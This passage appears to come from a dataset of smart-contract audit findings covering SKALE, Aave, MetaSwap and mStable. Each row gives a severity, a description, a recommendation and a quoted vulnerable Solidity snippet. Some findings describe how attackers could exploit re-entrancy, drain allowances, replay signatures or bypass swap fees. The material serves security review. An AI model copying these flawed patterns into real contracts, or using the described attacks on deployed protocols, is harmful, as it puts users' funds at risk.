the transition to the upgraded contracts (rewrite `_effectiveDelegatedSum` values based on the new calculation formula). This function is not part of this review and will be removed in the future updates.\\nUnlike the old architecture, `nodesByValidator[validatorId]` is no longer used within the system to calculate `_effectiveDelegatedSum` and bounties. This is replaced by using overall staked amount and duration.\\nIf a validator does not claim their bounty during a month, it is considered as a misbehave and her bounty goes to the bounty pool for the next month.\\nTo get the bounty, every node calls the `getBounty` function of the `SkaleManager` contract. This function can be called once per month. The size of the bounty is defined in the `BountyV2` contract in the `_calculateMaximumBountyAmount` function:\\n```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n\\nThe problem is that this amount actually represents the amount that should be paid to the validator of that node. But each node will get this amount. Additionally, the amount of validator's bounty should also correspond to the number of active nodes, while this formula only uses the amount of delegated funds.",Every node should get only their parts of the bounty.,,"```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n" +A node exit prevents some other nodes from exiting for some period Pending,medium,"When a node wants to exit, the `nodeExit` function should be called as many times, as there are schains in the node. Each time one schain is getting removed from the node. During every call, all the active schains are getting frozen for 12 hours.\\n```\\nfunction freezeSchains(uint nodeIndex) external allow(""SkaleManager"") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(""SchainsInternal""));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = ""Node cannot rotate on Schain "";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat("", occupied by Node "");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = ""DKG process did not finish on schain "";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(""SkaleDKG""));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n\\nBecause of that, no other node that is running one of these schains can exit during that period. In the worst-case scenario, one malicious node has 128 Schains and calls `nodeExit` every 12 hours. That means that some nodes will not be able to exit for 64 days.",Make node exiting process less synchronous.,,"```\\nfunction freezeSchains(uint nodeIndex) external allow(""SkaleManager"") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(""SchainsInternal""));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = ""Node cannot rotate on Schain "";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat("", occupied by Node "");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = ""DKG process did not finish on schain "";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(""SkaleDKG""));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n" +Removing a node require multiple transactions and may be very expensive Pending,medium,"When removing a node from the network, the owner should redistribute all the schains that are currently on that node to the other nodes. To do so, the validator should call the `nodeExit` function of the `SkaleManager` contract. In this function, only one schain is going to be removed from the node. So the node would have to call the `nodeExit` function as many times as there are schains in the node. Every call iterates over every potential node that can be used as a replacement (like in https://github.com/ConsenSys/skale-network-audit-2020-10/issues/3).\\nIn addition to that, the first call will iterate over all schains in the node, make 4 SSTORE operations and external calls for each schain:\\n```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(""ConstantsHolder""));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n\\nThis may hit the block gas limit even easier than issue 5.4.\\nIf the first transaction does not hit the block's gas limit, the maximum price of deleting a node would be BLOCK_GAS_COST * 128. At the moment, it's around $50,000.","Optimize the process of deleting a node, so it can't hit the gas limit in one transaction, and the overall price should be cheaper.",,"```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(""ConstantsHolder""));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n" +Adding a new schain may potentially hit the gas limit Pending,medium,"When adding a new schain, a group of random 16 nodes is randomly selected to run that schain. In order to do so, the `_generateGroup` function iterates over all the nodes that can be used for that purpose:\\n```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(""Nodes""));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, ""Not enough nodes to create Schain"");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), ""Could not remove space from Node"");\\n }\\n```\\n\\nIf the total number of nodes exceeds around a few thousands, adding a schain may hit the block gas limit.",Avoid iterating over all nodes when selecting a random node for a schain.,,"```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(""Nodes""));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, ""Not enough nodes to create Schain"");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), ""Could not remove space from Node"");\\n }\\n```\\n" +Re-entrancy attacks with ERC-777,low,"Some tokens may allow users to perform re-entrancy while calling the `transferFrom` function. For example, it would be possible for an attacker to “borrow” a large amount of ERC-777 tokens from the lending pool by re-entering the `deposit` function from within `transferFrom`.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n\\nBecause the `safeTransferFrom` call is happening at the end of the `deposit` function, the `deposit` will be fully processed before the tokens are actually transferred.\\nSo at the beginning of the transfer, the attacker can re-enter the call to withdraw their deposit. The withdrawal will succeed even though the attacker's tokens have not yet been transferred to the lending pool. Essentially, the attacker is granted a flash-loan but without paying fees.\\nAdditionally, after these calls, interest rates will be skewed because interest rate update relies on the actual current balance.\\nRemediation\\nDo not whitelist ERC-777 or other re-entrable tokens to prevent this kind of attack.",Resolution\\nThe issue was partially mitigated in `deposit` function by minting AToken before the transfer of the `deposit` token.,,"```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n" +Attacker can abuse swapLiquidity function to drain users' funds,medium,"The `swapLiquidity` function allows liquidity providers to atomically swap their collateral. The function takes a receiverAddressargument that normally points to an `ISwapAdapter` implementation trusted by the user.\\n```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n\\nHowever, since an attacker can pass any address as the `receiverAddress`, they can arbitrarily transfer funds from other contracts that have given allowances to the `LendingPool` contract (for example, another ISwapAdapter).\\nThe `amountToSwap` is defined by the caller and can be very small. The attacker gets the difference between `IERC20(toAsset).balanceOf(receiverAddress)` value of `toAsset` and the `amountToSwap` of `fromToken`.\\nRemediation\\nEnsure that no funds can be stolen from contracts that have granted allowances to the `LendingPool` contract.",Resolution\\nSolved by removing `swapLiquidity` functionality.,,"```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n" +VotingMachine - tryToMoveToValidating can lock up proposals,high,"After a vote was received, the proposal can move to a validating state if any of the votes pass the proposal's `precReq` value, referred to as the minimum threshold.\\n```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n\\nInside the method `tryToMoveToValidating` each of the vote options are checked to see if they pass `precReq`. In case that happens, the proposal goes into the next stage, specifically `Validating`.\\n```\\n/// @notice Function to move to Validating the proposal in the case the last vote action\\n/// was done before the required votingBlocksDuration passed\\n/// @param \\_proposalId The id of the proposal\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""VOTING\\_STATUS\\_REQUIRED"");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n }\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` checks the proposal's status to be `Voting` and proceeds to moving the proposal into `Validating` state.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n\\nThe problem appears if multiple vote options go past the minimum threshold. This is because the loop does not stop after the first found option and the loop will fail when the method `internalMoveToValidating` is called a second time.\\n```\\nfor (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` fails the second time because the first time it is called, the proposal goes into the `Validating` state and the second time it is called, the require check fails.\\n```\\nrequire(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n\\_proposal.proposalStatus = ProposalStatus.Validating;\\n```\\n\\nThis can lead to proposal lock-ups if there are enough votes to at least one option that pass the minimum threshold.","After moving to the `Validating` state return successfully.\\n```\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""VOTING\\_STATUS\\_REQUIRED"");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n return; // <- this was added\\n }\\n }\\n }\\n}\\n```\\n\\nAn additional change can be done to `internalMoveToValidating` because it is called only in `tryToMoveToValidating` and the parent method already does the check.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n // The line below can be removed\\n // require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n",,```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n +VotingMachine - verifyNonce should only allow the next nonce,high,"When a relayer calls `submitVoteByRelayer` they also need to provide a nonce. This nonce is cryptographicly checked against the provided signature. It is also checked again to be higher than the previous nonce saved for that voter.\\n```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n}\\n```\\n\\nWhen the vote is saved, the previous nonce is incremented.\\n```\\nvoter.nonce = voter.nonce.add(1);\\n```\\n\\nThis leaves the opportunity to use the same signature to vote multiple times, as long as the provided nonce is higher than the incremented nonce.","The check should be more restrictive and make sure the consecutive nonce was provided.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce + 1 == \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n",,"```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n}\\n```\\n" +VoteMachine - Cancelling vote does not increase the nonce,low,"A vote can be cancelled by calling `cancelVoteByRelayer` with the proposal ID, nonce, voter's address, signature and a hash of the sent params.\\nThe parameters are hashed and checked against the signature correctly.\\nThe nonce is part of these parameters and it is checked to be valid.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n\\nOnce the vote is cancelled, the data is cleared but the nonce is not increased.\\n```\\nif (\\_cachedVoter.balance > 0) {\\n \\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n \\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n voter.weight = 0;\\n voter.balance = 0;\\n voter.vote = 0;\\n voter.asset = address(0);\\n emit VoteCancelled(\\n \\_proposalId,\\n \\_voter,\\n \\_cachedVoter.vote,\\n \\_cachedVoter.asset,\\n \\_cachedVoter.weight,\\n \\_cachedVoter.balance,\\n uint256(\\_proposal.proposalStatus)\\n );\\n}\\n```\\n\\nThis means that in the future, the same signature can be used as long as the nonce is still higher than the current one.","Considering the recommendation from issue https://github.com/ConsenSys/aave-governance-dao-audit-2020-01/issues/4 is implemented, the nonce should also increase when the vote is cancelled. Otherwise the same signature can be replayed again.",,"```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n" +Possible lock ups with SafeMath multiplication Acknowledged,low,"In some cases using SafeMath can lead to a situation where a contract is locked up due to an unavoidable overflow.\\nIt is theoretically possible that both the `internalSubmitVote()` and `internalCancelVote()` functions could become unusable by voters with a high enough balance, if the asset weighting is set extremely high.\\nThis line in `internalSubmitVote()` could overflow if the voter's balance and the asset weight were sufficiently high:\\n```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n\\nA similar situation occurs in internalCancelVote():\\n```\\n\\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n\\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n```\\n","This could be protected against by setting a maximum value for asset weights. In practice it is very unlikely to occur in this situation, but it could be introduced at some point in the future.",,```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n +Reentrancy vulnerability in MetaSwap.swap(),high,"`MetaSwap.swap()` should have a reentrancy guard.\\nThe adapters use this general process:\\nCollect the from token (or ether) from the user.\\nExecute the trade.\\nTransfer the contract's balance of tokens (from and to) and ether to the user.\\nIf an attacker is able to reenter `swap()` before step 3, they can execute their own trade using the same tokens and get all the tokens for themselves.\\nThis is partially mitigated by the check against `amountTo` in `CommonAdapter`, but note that the `amountTo` typically allows for slippage, so it may still leave room for an attacker to siphon off some amount while still returning the required minimum to the user.\\n```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, ""INSUFFICIENT\\_AMOUNT"");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n\\nAs an example of how this could be exploited, 0x supports an “EIP1271Wallet” signature type, which invokes an external contract to check whether a trade is allowed. A malicious maker might front run the swap to reduce their inventory. This way, the taker is sending more of the taker asset than necessary to `MetaSwap`. The excess can be stolen by the maker during the EIP1271 call.","Use a simple reentrancy guard, such as OpenZeppelin's `ReentrancyGuard` to prevent reentrancy in `MetaSwap.swap()`. It might seem more obvious to put this check in `Spender.swap()`, but the `Spender` contract intentionally does not use any storage to avoid interference between different adapters.",,"```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, ""INSUFFICIENT\\_AMOUNT"");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n" +Simplify fee calculation in WethAdapter,low,"`WethAdapter` does some arithmetic to keep track of how much ether is being provided as a fee versus as funds that should be transferred into WETH:\\n```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, ""MSG\\_VAL\\_INSUFFICIENT"");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n\\nThis code can be simplified by using `address(this).balance` instead.","Resolution\\nConsenSys/[email protected]93bf5c6.\\nConsider something like the following code instead:\\n```\\nif (address(tokenFrom) == Constants.ETH) {\\n getWETH().deposit{value: amountFrom}(); // will revert if the contract has an insufficient balance\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Send the remaining balance as the fee.\\naggregator.functionCallWithValue(abi.encodePacked(method, data), address(this).balance);\\n```\\n\\nAside from being a little simpler, this way of writing the code makes it obvious that the full balance is being properly consumed. Part is traded, and the rest is sent as a fee.",,"```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, ""MSG\\_VAL\\_INSUFFICIENT"");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n" +Consider checking adapter existence in MetaSwap,low,"`MetaSwap` doesn't check that an adapter exists before calling into Spender:\\n```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n\\nThen `Spender` performs the check and reverts if it receives `address(0)`.\\n```\\nfunction swap(address adapter, bytes calldata data) external payable {\\n require(adapter != address(0), ""ADAPTER\\_NOT\\_SUPPORTED"");\\n```\\n\\nIt can be difficult to decide where to put a check like this, especially when the operation spans multiple contracts. Arguments can be made for either choice (or even duplicating the check), but as a general rule it's a good idea to avoid passing invalid parameters internally. Checking for adapter existence in `MetaSwap.swap()` is a natural place to do input validation, and it means `Spender` can have a simpler model where it trusts its inputs (which always come from MetaSwap).",Drop the check from `Spender.swap()` and perform the check instead in `MetaSwap.swap()`.,,"```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n" +Swap fees can be bypassed using redeemMasset,high,"Part of the value proposition for liquidity providers is earning fees incurred for swapping between assets. However, traders can perform fee-less swaps by providing liquidity in one bAsset, followed by calling `redeemMasset()` to convert the resulting mAssets back into a proportional amount of bAssets. Since removing liquidity via `redeemMasset()` does not incur a fee this is equivalent to doing a swap with zero fees.\\nAs a very simple example, assuming a pool with 2 bAssets (say, DAI and USDT), it would be possible to swap 10 DAI to USDT as follows:\\nAdd 20 DAI to the pool, receive 20 mUSD\\ncall redeemMasset() to redeem 10 DAI and 10 USDT\\nThe boolean argument `applyFee` is set to `false` in _redeemMasset:\\n```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\n",Resolution\\nThis issue was reported independently via the bug bounty program and was fixed early during the audit. The fix has already been deployed on mainnet using the upgrade mechanism\\nCharge a small redemption fee in `redeemMasset()`.,,"```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\n" +Users can collect interest from SavingsContract by only staking mTokens momentarily,high,"The SAVE contract allows users to deposit mAssets in return for lending yield and swap fees. When depositing mAsset, users receive a “credit” tokens at the momentary credit/mAsset exchange rate which is updated at every deposit. However, the smart contract enforces a minimum timeframe of 30 minutes in which the interest rate will not be updated. A user who deposits shortly before the end of the timeframe will receive credits at the stale interest rate and can immediately trigger and update of the rate and withdraw at the updated (more favorable) rate after the 30 minutes window. As a result, it would be possible for users to benefit from interest payouts by only staking mAssets momentarily and using them for other purposes the rest of the time.\\n```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\n",Remove the 30 minutes window such that every deposit also updates the exchange rate between credits and tokens. Note that this issue was reported independently during the bug bounty program and a fix is currently being worked on.,,```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\n +Internal accounting of vault balance may diverge from actual token balance in lending pool Won't Fix,medium,"It is possible that the vault balance for a given bAsset is greater than the corresponding balance in the lending pool. This violates one of the correctness properties stated in the audit brief. Our Harvey fuzzer was able to generate a transaction that mints a small amount (0xf500) of mAsset. Due to the way that the lending pool integration (Compound in this case) updates the vault balance it ends up greater than the available balance in the lending pool.\\nMore specifically, the integration contract assumes that the amount deposited into the pool is equal to the amount received by the mAsset contract for the case where no transaction fees are charged for token transfers:\\n```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n\\nFor illustration, consider the following scenario: assume your current balance in a lending pool is 0. When you deposit some amount X into the lending pool your balance after the deposit may be less than X (even if the underlying token does not charge transfer fees). One reason for this is rounding, but, in theory, a lending pool could also charge fees, etc.\\nThe vault balance is updated in function `Masset._mintTo` based on the amount returned by the integration.\\n```\\nbasketManager.increaseVaultBalance(bInfo.index, integrator, quantityDeposited);\\n```\\n\\n```\\nuint256 deposited = IPlatformIntegration(\\_integrator).deposit(\\_bAsset, quantityTransferred, \\_erc20TransferFeeCharged);\\n```\\n\\nThis violation of the correctness property is temporary since the vault balance is readjusted when interest is collected. However, the time frame of ca. 30 minutes between interest collections (may be longer if no continuous interest is distributed) means that it may be violated for substantial periods of time.\\n```\\nuint256 balance = IPlatformIntegration(integrations[i]).checkBalance(b.addr);\\nuint256 oldVaultBalance = b.vaultBalance;\\n\\n// accumulate interest (ratioed bAsset)\\nif(balance > oldVaultBalance && b.status == BassetStatus.Normal) {\\n // Update 